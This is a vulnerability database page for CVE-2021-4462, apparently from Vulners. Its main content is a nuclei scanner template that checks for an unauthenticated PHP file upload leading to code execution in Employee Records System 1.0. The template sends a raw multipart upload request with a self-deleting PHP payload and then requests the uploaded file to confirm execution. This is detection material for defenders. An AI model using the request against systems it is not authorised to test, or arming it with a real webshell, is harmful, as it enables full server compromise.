Lucene search
K

Employee Records System 1.0 - Unauthenticated File Upload RCE

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Unauthenticated file upload in Employee Records System 1.0 enables remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Skittles Employee_Records_System
25 Nov 202507:32
githubexploit
Circl
CVE-2021-4462
11 Nov 202501:30
circl
CNNVD
Employee Records System 安全漏洞
10 Nov 202500:00
cnnvd
CVE
CVE-2021-4462
10 Nov 202522:32
cve
Cvelist
CVE-2021-4462 Employee Records System v1.0 Arbitrary File Upload RCE
10 Nov 202522:32
cvelist
EUVD
EUVD-2021-34713
11 Nov 202500:30
euvd
NVD
CVE-2021-4462
10 Nov 202523:15
nvd
OSV
CVE-2021-4462
10 Nov 202523:15
osv
Positive Technologies
PT-2025-46216
10 Nov 202500:00
ptsecurity
RedhatCVE
CVE-2021-4462
11 Nov 202522:44
redhatcve
Rows per page
id: CVE-2021-4462

info:
  name: Employee Records System 1.0 - Unauthenticated File Upload RCE
  author: josephttd
  severity: critical
  description: |
    Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files via uploadID.php and achieve remote code execution, leading to complete server compromise.
  remediation: |
    Apply security patches or upgrade to a later version of Employee Records System.
  reference:
    - https://www.exploit-db.com/exploits/49596
    - https://www.sourcecodester.com/php/11393/employee-records-system.html
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cwe-id: CWE-434
    epss-score: 0.03054
    epss-percentile: 0.85981
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2021,employee-records,fileupload,rce,intrusive,vkev

variables:
  string: "CVE-2021-4462"
  filename: "{{to_lower(rand_base(5))}}.php"

http:
  - raw:
      - |
        POST /dashboard/uploadID.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="employee_ID"; filename="{{filename}}"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__); ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

      - |
        GET /uploads/employees_ids/{{upload_filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: upload_filename
        part: body
        internal: true
        group: 1
        regex:
          - '"upload_filename":"([^"]+)"'

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{md5(string)}}")'
        condition: and
# digest: 4a0a0047304502207536dc0722fca6d30c299c7caad87ffd84d5055b988d49cd0807aacb9e904e71022100b73b7321a9efc168509eb7ec7c0bcc7bcaedac04587e1a84d9276c807cb3bb50:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.8
CVSS 49.3
EPSS0.03054
SSVC
22